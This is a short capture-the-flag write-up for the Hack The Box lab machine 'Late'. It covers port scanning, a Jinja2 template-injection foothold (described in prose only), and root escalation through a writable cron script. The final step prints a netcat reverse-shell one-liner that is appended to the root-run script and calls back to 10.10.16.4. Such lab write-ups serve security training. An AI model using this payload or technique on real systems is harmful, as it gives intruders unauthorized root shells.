Machine Info
- OS: Linux
- Difficulty: Easy
- Points: 20
- Release: 23 Apr 2022
- IP: 10.10.11.156
Network Scanning
We have only two open ports http:80 and ssh:22
1
nmap -p- -A 10.10.11.156
Enumeration
While checking the webpage, we notice that we have domain “late.htb” and sub-domain “images.late.htb”. Add them to /etc/hosts file.
1
2
gedit /etc/hosts
10.10.11.156 late.htb images.late.htb
Nothing interested at “late.htb”. At “images.late.htb”, we have a webpage with an upload feature implemented with flask framework.
Since this webapp use flask, maybe it is vulnerable to “Server Side Tempelate Injection-SSTI”. As here SSTI, we identified that “jinja2” is used as template engine and it is vulnerable to SSTI.
To convert text to image this website cloudconvert is helpfull.
Exploitation
Now it is time to exploit. This article explains how to exploit SSTI to RCE SSTI in Flask/Jinja2.
There is a “svc_acc” user. let’s get its ssh private key and login.
Here is the user flag.
Privilege Escalation
Using “linpeas” and “pspy64”, we notice that there is a script called “ssh-alert.sh” with a write permission. This script is originally owned to root and running by cron periodically. The script is sending an alert to root whenever a ssh login occured.
Since we have a write permission to that script, we can append a mallicious payload to get a reverse shell as root.
1
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 9999 >/tmp/f' >> ssh-alert.sh; ssh localhost "exit"
